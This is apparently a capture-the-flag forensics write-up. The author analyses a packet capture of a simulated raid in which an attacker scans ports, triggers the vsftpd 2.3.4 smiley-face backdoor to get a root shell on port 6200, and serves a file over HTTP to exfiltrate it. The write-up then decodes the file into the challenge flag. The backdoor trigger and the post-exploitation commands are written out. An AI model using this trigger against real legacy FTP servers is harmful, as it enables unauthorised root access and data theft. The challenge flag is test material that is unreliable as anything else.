Boarding of the Black Pearl - Forensics
Points: 50 | Flag: BCCTF{b1@ckp3@r1_10$t_1t$_tr3@$ur3} | Solved by: Smothy @ 0xN1umb
what we got
a single pcap file blackpearl_vs_royalnavy.pcap - network capture from the "raid" on the Black Pearl. classic forensics stuff, lets dig in
the solve
opened it up with tshark and immediately saw the protocol hierarchy - we got TCP with FTP, SSH, Telnet, SMTP, HTTP, and some raw data streams. interesting mix
frame
eth
ip
tcp
ssh, telnet, ftp, smtp, data, http
first thing that jumps out - there's a port scan at the beginning. attacker on 172.16.40.16 scanning 172.16.40.17 ports 1-50. finds SSH (22), Telnet (23), FTP (21), and SMTP (25) open
then the juicy part. attacker connects to FTP and we see:
220 (vsFTPd 2.3.4)
USER GjmxtQ:)
331 Please specify the password.
PASS 5m
vsFTPd 2.3.4 with a username ending in :) - if you know, you know lmao. thats the infamous vsftpd backdoor. any username with a smiley face :) triggers a root shell on port 6200. classic metasploitable moment
sure enough, right after the FTP login attempt, there's a connection to port 6200 that succeeds. following that TCP stream reveals the whole shell session:
id
uid=0(root) gid=0(root)
whoami
root
cd home
ls
ftp msfadmin service user
cd msfadmin
ls
treasure vulnerable
cd treasure
ls
map.b64
python -m SimpleHTTPServer 8080
attacker got root, navigated to /home/msfadmin/treasure/, found map.b64, and spun up a python http server to exfil it. ngl thats exactly what i wouldve done too
then we see the HTTP request:
GET /map.b64 HTTP/1.1
extracted the file from the HTTP response (tshark --export-objects ftw):
QkNDVEZ7YjFAY2twM0ByMV8xMCR0XzF0JF90cjNAJHVyM30K
thats base64. decode it and...
$ echo "QkNDVEZ7YjFAY2twM0ByMV8xMCR0XzF0JF90cjNAJHVyM30K" | base64 -d
BCCTF{b1@ckp3@r1_10$t_1t$_tr3@$ur3}boom. blackpearl lost its treasure fr
flag
BCCTF{b1@ckp3@r1_10$t_1t$_tr3@$ur3}
smothy out ✌️